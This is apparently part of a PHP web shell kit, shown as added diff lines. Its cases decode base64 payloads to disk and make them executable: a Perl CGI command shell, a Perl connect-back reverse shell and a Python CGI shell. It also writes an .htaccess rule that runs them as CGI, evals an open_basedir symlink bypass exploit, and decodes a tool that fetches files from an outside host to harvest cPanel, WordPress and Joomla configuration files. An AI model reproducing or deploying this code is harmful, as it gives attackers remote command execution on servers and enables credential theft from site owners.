+CXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhh
+dmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1Bh
+Z2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBNYWlu
+IFByb2dyYW0gLSBFeGVjdXRpb24gU3RhcnRzIEhlcmUNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
+CiZSZWFkUGFyc2U7DQomR2V0Q29va2llczsNCg0KJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NS
+SVBUX05BTUUnfTsNCiRTZXJ2ZXJOYW1lID0gJEVOVnsnU0VSVkVSX05BTUUnfTsNCiRMb2dpblBh
+c3N3b3JkID0gJGlueydwJ307DQokUnVuQ29tbWFuZCA9ICRpbnsnYyd9Ow0KJFRyYW5zZmVyRmls
+ZSA9ICRpbnsnZid9Ow0KJE9wdGlvbnMgPSAkaW57J28nfTsNCg0KJEFjdGlvbiA9ICRpbnsnYSd9
+Ow0KJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNp
+ZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29t
+bWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAkaW57J2QnfTsNCmNob3AoJEN1
+cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZElu
+ID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJs
+b2dpbiIgfHwgISRMb2dnZWRJbikgIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJm
+b3JtTG9naW47DQoNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKSAjIHVzZXIgd2FudHMg
+dG8gcnVuIGEgY29tbWFuZA0Kew0KCSZFeGVjdXRlQ29tbWFuZDsNCn0NCmVsc2lmKCRBY3Rpb24g
+ZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlDQp7DQoJJlVwbG9hZEZp
+bGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJkb3dubG9hZCIpICMgdXNlciB3YW50cyB0byBkb3du
+bG9hZCBhIGZpbGUNCnsNCgkmRG93bmxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAibG9n
+b3V0IikgIyB1c2VyIHdhbnRzIHRvIGxvZ291dA0Kew0KCSZQZXJmb3JtTG9nb3V0Ow0KfQ==';
+
+$file = fopen("izo.cin" ,"w+");
+$write = fwrite ($file ,base64_decode($cgishellizocin));
+fclose($file);
+� � chmod("izo.cin",0755);
+$netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
+MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
+ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
+MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
+ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
+MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
+Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
+KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
+SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
+ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
+UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
+VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
+ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
+JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
+bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
+ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
+YXRhY2hlZFxuXG4iOw==';
+
+$file = fopen("dc.pl" ,"w+");
+$write = fwrite ($file ,base64_decode($netcatshell));
+fclose($file);
+� � chmod("dc.pl",0755);
+� �echo "<iframe src=cgitelnet1/izo.cin width=100% height=100%
+frameborder=0></iframe> ";
+break;
+case "PHP_7":
+
+� � mkdir('python', 0755);
+� � chdir('python');
+� � � � $kokdosya = ".htaccess";
+� � � � $dosya_adi = "$kokdosya";
+� � � � $dosya = fopen ($dosya_adi , 'w') or die ("Dosya
+a&#231;&#305;lamad&#305;!");
+� � � � $metin = "AddHandler cgi-script .izo";
+� � � � fwrite ( $dosya , $metin ) ;
+� � � � fclose ($dosya);
+$pythonp = 'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB
+IHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD
+b3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg
+cmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv
+ciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg
+Y29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg
+Zm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv
+YXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g
+ZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj
+IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5
+OgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y
+dCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz
+dHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy
+b20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
+IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs
+aW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt
+c2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw
+NCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg
+PSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F
+VEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
+IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl
+cwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi
+IlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g
+aXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs
+dWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu
+Zy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g
+d2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg
+aXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg
+ICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk
+XSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt
+W2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv
+cm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg
+PSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y
+IGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg
+ICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z
+aGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+
+CjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48
+ST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl
+cnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs
+ICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg
+Q29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr
+IHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1
+dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5
+ZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n
+IFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
+IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj
+cmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6
+IHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg
+ICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs
+YW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt
+KFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt
+aGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+
+PEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS
+PicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg
+ICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg
+ICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv
+dXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy
+aW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv
+biwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv
+bW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ
+TygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh
+bHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg
+ICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD
+SEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0
+ZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw
+cm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi';
+
+$file = fopen("python.izo" ,"w+");
+$write = fwrite ($file ,base64_decode($pythonp));
+fclose($file);
+� � chmod("python.izo",0755);
+� �echo "<iframe src=python/python.izo width=100% height=100%
+frameborder=0></iframe> ";
+break;
+case "PHP_8":
+
+$mode="cp";//????????????.
+if($_REQUEST['bypass']!=$mode)
+{
+� �echo "<iframe src=cp width=100% height=100% frameborder=0></iframe> ";
+exit;
+}
+eval(base64_decode("LyoNClBIUCA1LjIuMTEvNS4zLjAgc3ltbGluaygpIG9wZW5fYmFzZWRpciBieXBhc3MgDQpieSBN
+YWtzeW1pbGlhbiBBcmNpZW1vd2ljeiBodHRwOi8vc2VjdXJpdHlyZWFzb24uY29tLw0KY3hpYiBb
+IGEuVF0gc2VjdXJpdHlyZWFzb24gWyBkMHRdIGNvbQ0KDQpDSFVKV0FNV01VWkcNCiovDQoNCiRm
+YWtlZGlyPSJjeCI7DQokZmFrZWRlcD0xNjsNCg0KJG51bT0wOyAvLyBvZmZzZXQgb2Ygc3ltbGlu
+ay4kbnVtDQoNCmlmKCFlbXB0eSgkX0dFVFsnZmlsZSddKSkgJGZpbGU9JF9HRVRbJ2ZpbGUnXTsN
+CmVsc2UgaWYoIWVtcHR5KCRfUE9TVFsnZmlsZSddKSkgJGZpbGU9JF9QT1NUWydmaWxlJ107DQpl
+bHNlICRmaWxlPSIiOw0KDQplY2hvICc8UFJFPjxpbWcNCnNyYz0iaHR0cDovL3NlY3VyaXR5cmVh
+c29uLmNvbS9nZngvbG9nby5naWY/Y3g1MjExLnBocCI+PFA+VGhpcyBpcyBleHBsb2l0DQpmcm9t
+IDxhDQpocmVmPSJodHRwOi8vc2VjdXJpdHlyZWFzb24uY29tLyIgdGl0bGU9IlNlY3VyaXR5IEF1
+ZGl0IFBIUCI+U2VjdXJpdHkgQXVkaXQNCkxhYiAtIFNlY3VyaXR5UmVhc29uPC9hPiBsYWJzLg0K
+QXV0aG9yIDogTWFrc3ltaWxpYW4gQXJjaWVtb3dpY3oNCjxwPlNjcmlwdCBmb3IgbGVnYWwgdXNl
+IG9ubHkuDQo8cD5QSFAgNS4yLjExIDUuMy4wIHN5bWxpbmsgb3Blbl9iYXNlZGlyIGJ5cGFzcw0K
+PHA+TW9yZTogPGEgaHJlZj0iaHR0cDovL3NlY3VyaXR5cmVhc29uLmNvbS8iPlNlY3VyaXR5UmVh
+c29uPC9hPg0KPHA+PGZvcm0gbmFtZT0iZm9ybSINCiBhY3Rpb249Ij9CYWNrQ29ubmVjdD1QSFBf
+OCZieXBhc3M9Y3AiIG1ldGhvZD0icG9zdCI+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImZpbGUi
+IHNpemU9IjUwIg0KdmFsdWU9IicuaHRtbHNwZWNpYWxjaGFycygkZmlsZSkuJyI+PGlucHV0IHR5
+cGU9InN1Ym1pdCIgbmFtZT0iaHltIg0KdmFsdWU9IkNyZWF0ZSBTeW1saW5rIj48L2Zvcm0+JzsN
+Cg0KaWYoZW1wdHkoJGZpbGUpKQ0KICAgIGV4aXQ7DQoNCmlmKCFpc193cml0YWJsZSgiLiIpKQ0K
+ICAgIGRpZSgibm90IHdyaXRhYmxlIGRpcmVjdG9yeSIpOw0KDQokbGV2ZWw9MDsNCg0KZm9yKCRh
+cz0wOyRhczwkZmFrZWRlcDskYXMrKyl7DQogICAgaWYoIWZpbGVfZXhpc3RzKCRmYWtlZGlyKSkN
+CiAgICAgICAgbWtkaXIoJGZha2VkaXIpOw0KICAgIGNoZGlyKCRmYWtlZGlyKTsNCn0NCg0Kd2hp
+bGUoMTwkYXMtLSkgY2hkaXIoIi4uIik7DQoNCiRoYXJkc3R5bGUgPSBleHBsb2RlKCIvIiwgJGZp
+bGUpOw0KDQpmb3IoJGE9MDskYTxjb3VudCgkaGFyZHN0eWxlKTskYSsrKXsNCiAgICBpZighZW1w
+dHkoJGhhcmRzdHlsZVskYV0pKXsNCiAgICAgICAgaWYoIWZpbGVfZXhpc3RzKCRoYXJkc3R5bGVb
+JGFdKSkgDQogICAgICAgICAgICBta2RpcigkaGFyZHN0eWxlWyRhXSk7DQogICAgICAgIGNoZGly
+KCRoYXJkc3R5bGVbJGFdKTsNCiAgICAgICAgJGFzKys7DQogICAgfQ0KfQ0KJGFzKys7DQp3aGls
+ZSgkYXMtLSkNCiAgICBjaGRpcigiLi4iKTsNCg0KQHJtZGlyKCJmYWtlc3ltbGluayIpOw0KQHVu
+bGluaygiZmFrZXN5bWxpbmsiKTsNCg0KQHN5bWxpbmsoc3RyX3JlcGVhdCgkZmFrZWRpci4iLyIs
+JGZha2VkZXApLCJmYWtlc3ltbGluayIpOw0KDQovLyB0aGlzIGxvb3Agd2lsbCBza2lwIGFsbHJl
+YWR5IGNyZWF0ZWQgc3ltbGlua3MuDQp3aGlsZSgxKQ0KICAgIGlmKHRydWU9PShAc3ltbGluaygi
+ZmFrZXN5bWxpbmsvIi5zdHJfcmVwZWF0KCIuLi8iLCRmYWtlZGVwLTEpLiRmaWxlLA0KInN5bWxp
+bmsiLiRudW0pKSkgYnJlYWs7DQogICAgZWxzZSAkbnVtKys7DQoNCkB1bmxpbmsoImZha2VzeW1s
+aW5rIik7DQpta2RpcigiZmFrZXN5bWxpbmsiKTsNCg0KZGllKCc8Rk9OVCBDT0xPUj0iUkVEIj5j
+aGVjayBzeW1saW5rIDxhDQpocmVmPSIuL3N5bWxpbmsnLiRudW0uJyI+c3ltbGluaycuJG51bS4n
+PC9hPiBmaWxlPC9GT05UPicpOw=="));
+break;
+case "PHP_9":
+� � mkdir('perltools', 0755);
+� � chdir('perltools');
+$perltoolss = 'PD9waHAKLyoKCiovCmVjaG8gIjxodG1sPjx0aXRsZT5JbXBvcnRlciBUMDBseiB2LjQ8L3RpdGxl
+PjxoZWFkPjxMSU5LIFJFTD0nU0hPUlRDVVQgSUNPTidIUkVGPSdodHRwOi8vd3d3LmhhY2stYm9v
+ay5uZXQvZmF2aWNvbi5pY28nPjwvaGVhZD4KPHN0eWxlPmE6bGluayB7dGV4dC1kZWNvcmF0aW9u
+Om5vbmU7fWE6aG92ZXIgeyAgICAgYm9yZGVyLWJvdHRvbTogMXB4IGRvdHRlZCAjYmEwMDAwO31h
+OnZpc2l0ZWQge3RleHQtZGVjb3JhdGlvbjpub25lO308L3N0eWxlPgo8Ym9keSB0ZXh0PScjRkYw
+MDAwJyBiZ2NvbG9yPScjMDAwMDAwJyBsaW5rPScjQ0NDQ0NDJyB2bGluaz0nIzgwODA4MCcgYWxp
+bms9JyM5OTk5OTknPjxkaXYgYWxpZ249J2NlbnRlcic+PGJyPgo8aW1nIGJvcmRlcj0nMCcgc3Jj
+PSdodHRwOi8vdXBsb2FkLnRyYWlkbnQubmV0L3VwZmlsZXMvbzhJOTk4MTAucG5nJyB3aWR0aD0n
+NTY2JyBoZWlnaHQ9JzI4Myc+PC9kaXY+Cjxmb250IGZhY2U9J3RhaG9tYScgc2l6ZT0nMicgY29s
+b3I9JyNmMzAwMDAnPjxicj48Yj48IS0tIGhhY2stYm9vay5uZXQgLS0+IjsKQHNldF90aW1lX2xp
+bWl0KDApOwpAZXJyb3JfcmVwb3J0aW5nKEVfQUxMIHwgRV9OT1RJQ0UpOwokeD1hcnJheSggImh0
+LnR4dCI9PiIuaHRhY2Nlc3MiLCAiY2dpLW5ldy50eHQiPT4iY2dpLnIxeiIsICJkby1uZXcudHh0
+Ij0+ImRvbWFpbi5yMXoiLCAidXNlci50eHQiPT4idXNlci5yMXoiLCAiY28udHh0Ij0+ImNvbmZp
+Zy5yMXoiLCAic3ltLnR4dCI9PiJzeW1saW5rLnIxeiIsICJzcWwtbmV3LnR4dCI9PiJzcWwucGhw
+IiwgInI1Ny50eHQiPT4icjU3LnBocCIsICJjcGFuZWwudHh0Ij0+ImNwYW5lbC5waHAiLCAiZG9t
+YWlucy10eHQudHh0Ij0+ImRvbWFpbi5waHAiLCAiam9vbWxhLnR4dCI9PiJqb29tbGEucGhwIiwg
+IndwLnR4dCI9PiJ3cC5waHAiLCAiY29uZmlnLXBocC50eHQiPT4iY29uZmlnLnBocCIsICJpbmku
+dHh0Ij0+ImluaS5waHAiLCAidmIudHh0Ij0+InZiLnBocCIsICJpc3N3LnR4dCI9PiJpc3N3LnBo
+cCIsICJwbnB4LWluaS50eHQiPT4icGhwLmluaSIsICk7CmZvcmVhY2goJHggYXMgJGQ9PiR6KXsg
+JGZpbGUgPSBmb3BlbigkeiAsIncrIik7CiRyMHg9ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly93
+d3cubXVzaWM0ZnVuLm9yZy9yMHgzZC9yMHgvJy4kZCk7CiR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUg
+LCRyMHgpOwpmY2xvc2UoJGZpbGUpOwppZigkd3JpdGUpeyBlY2hvICJbK10gV3JpdGVkIDogPGEg
+aHJlZj0nLi8keic+JHo8L2E+IDwvYnI+IjsKfWVsc2V7IGVjaG8gIlt+XSBDYW4ndCBXcml0ZSA6
+ICR6IDxicj4iOwp9CmNobW9kKCR6ICwgMDc1NSk7Cn0KZWNobyAiPC9iPjwvZm9udD48Yj48Yj48
+Zm9udCBmYWNlPSdUYWhvbWEnIHNpemU9JzInIGNvbG9yPScjQ0NDQ0NDJz48L2ZvbnQ+PC9iPjxm
+b250IGZhY2U9J1RhaG9tYScgc2l6ZT0nMicgY29sb3I9JyM5OTk5OTknPjxiPjwvYj48IS0tIC9o
+YWNrLWJvb2submV0IC0tPjxicj48L2ZvbnQ+PC9iPjxwIGFsaWduPSdjZW50ZXInPjxmb250IGZh
+Y2U9J1RhaG9tYScgc3R5bGU9J2ZvbnQtc2l6ZTogOXB0Jz48Zm9udCBjb2xvcj0nI0ZGRkZGRic+
+Q29kZWQgQnk8L2ZvbnQ+PGZvbnQgY29sb3I9JyNGRjAwMDAnPiBJcmFRaWFOLXIweCA8L2ZvbnQ+
+PGZvbnQgY29sb3I9JyNGRkZGRkYnPiB8PC9mb250Pjxmb250IGNvbG9yPScjRkYwMDAwJz4gPGEg
+aHJlZj0naHR0cDovL3d3dy5oYWNrLWJvb2submV0L3ZiLyc+d3d3LkhhY2stQm9vay5uZXQ8L2E+
+PC9mb250PjwvZm9udD48L3A+PHAgYWxpZ249J2NlbnRlcic+PGZvbnQgZmFjZT0nVGFob21hJyBz
+dHlsZT0nZm9udC1zaXplOiA5cHQnPkdyRUV0eiBUbzwvZm9udD48Zm9udCBmYWNlPSdUYWhvbWEn
+IGNvbG9yPScjRkZGRkZGJyBzdHlsZT0nZm9udC1zaXplOiA5cHQnPiBbI11+PC9mb250Pjxmb250
+IGZhY2U9J1RhaG9tYScgY29sb3I9JyNDQ0NDQ0MnIHN0eWxlPSdmb250LXNpemU6IDlwdCc+IEth
+cmFyIGFsU2hhTWk8L2ZvbnQ+PGZvbnQgZmFjZT0nVGFob21hJyBjb2xvcj0nI0ZGRkZGRicgc3R5
+bGU9J2ZvbnQtc2l6ZTogOXB0Jz58IEFuZCBBbGwgTXkgRnJpZW5kczwvcD48L2ZvbnQ+PGI+PGZv
+bnQgZmFjZT0nVGFob21hJyBzaXplPScyJyBjb2xvcj0nI0ZGRkZGRic+PC9odG1sPiI7CiMgZGVj
+cnlwdGVkOgojIGV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJ0RaUkh6cVJvQWdYM2M0cmFk
+WlZZNE9GRHJaNFJKdkdRMkFSeU04Sjc3emw5L3lkNFV1aEYvT2RYZnNUZDcvS3BoNktMdC94M0Vx
+ODVSZncveTlNeHkzLy9KV1EyS3V5MnhMNEV4NW96cFVNeDBsRGZ0UmM0ZlE0ZTI1R2kxQ0FCaE1F
+d0Juc3dwQnNNQW9rU1RIOUtrL3JRMEcxcW02b0xjTjFvUlgzb2NvZy85ZjJHNjh0NDJ0SHJzYW4x
+M1l0ZkJtenhDY1Jld05ablNDZ3FFK0o1RVB2bVVONktwbnJKREphdUNqTG05SThVSnE4NXVNcDdI
+Q2NuVk10emlGK2dKWWU2K05xdGdxbTg3azdWUHFmdmJkczZPWGoyV0F1dTdsMFJRdXZIRmk0bmF6
+cm1UZFZ2WFlLY2xQTjZnMkdkS292R2JYUmk3RW5sN295TjYzU1Myd0lkc3NydkgzRVEwK0tVUFk4
+d0QycHBVMGVnMVBEcU83ay81bXdiTkU2emVUTHRDV0ZYSW12cWs0dXFFZVpaT3BkUlMwU3BFRnFq
+TU04R2dTNkxQQXlMZ2VSYk9JTzA5c1lZdG16NjNKdk1sUWFmTFlPOTRBbVB2ZUhNVmg4OW1tRml6
+L21xem5MUWRXSGZRU2gya1loUVN4SkhwZ21oU2NZcWlFV1VtYXFDMWhWcWRCS2djYnBoOWRZN2lj
+NXdaTldiNy9KRkd3SnNnbC9rK081ZitlZEU3ZWtWZElGY0YvMytmSHhTdWJ3TlJiOXE1ZXlMUkNx
+Q0ZLR29yb0RTVTFYTkZkS0xUVVhhMmUxRlRnTlBnSmYrSUZCN3l4NitaNFZGVGRCM2Z5b3hLT21t
+cStSUnZ4TDVTSGdoNUJ5anN4Mjhrck92dHpXVjd3NEhxQ2lEUENGemZ6WnN5WHp2dFJxNmc0aUcz
+NmZpYU1GVUN0eVk0bzdwdXRzaHRDSkdid3gyblE1MzlUSGpaQlFWdWtrRy95SFYzV0h2c21CUHlL
+eHFVeEdyU1BFVjk1ajhwYWs4ZnJZeGFpSUtXako4d0pwM0Z1ZWZWZ2liTnhzK1drMWN0cXoyK3ZQ
+VjhtZE5tdEpvSFRGWXByVVE3dE9Fd1pzcVB6WFJta2VXU3VtcFJZTmZmUjQrNVRDWjFXUFlFUmZi
